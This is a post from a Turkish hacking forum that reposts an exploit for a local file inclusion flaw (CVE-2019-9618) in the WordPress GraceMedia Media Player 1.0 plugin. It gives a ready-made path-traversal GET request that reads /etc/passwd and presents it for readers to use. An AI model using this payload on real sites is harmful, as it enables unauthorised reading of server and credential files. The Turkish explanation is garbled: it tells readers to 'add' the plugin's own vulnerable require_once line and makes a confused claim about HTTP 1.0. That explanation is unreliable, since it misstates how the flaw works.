İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

13-03-2019 21:26
#1
deargod - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
vice city
Mesajlar:
167
Teşekkür (Etti):
20
Teşekkür (Aldı):
36
Konular:
15
Ticaret:
(0) %
# Exploit Title / Exploit Başlığı : WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
# Date / Tarih: 13-02-2019
# Original Date / İlk sürülme tarihi : February 06, 2019/Şubat 06, 2019
# Author / Ekleyen: MANUEL GARCÍA CÁRDENAS
# Version / Versiyon: 1.0
# Category / Kategori: Webapps
# Tested on / Test edilen platform: Php
# CVE: 2019-9618

Açıklama:
**
GraceMedia Player , web sitenize API kullanarak doğrudan video eklemenizi sağlayan bir wordpress eklentisidir.
**

**
Güvenlik Açığı Türü:
Vulnerability-Local File Inclusion
**

**
Güvenlik Açığı :
Bu dosya younda açık bulundu:
/gracemedia-media-player/templates/files/ajax_controller.php
Açık için önce bu kodu ekleyin:
require_once($_GET['cfg']);
(cfg yazan yere kendi yerel dosyalarınızın yolunu ekleyin)
Bu açık sadece http 1.0 sürümlerinde kullanılabilir.
**
Örnek :
GET İsteği:
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

Exploit Adresi : https://www.exploit-db.com/exploits/46537
Kullanıcı İmzası
"Ulusal egemenlik öyle bir nurdur ki, onun karşısında zincirler erir, taç ve tahtlar yanar, mahvolur."
Mustafa Kemal ATATÜRK

telegram: deargod_tht


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı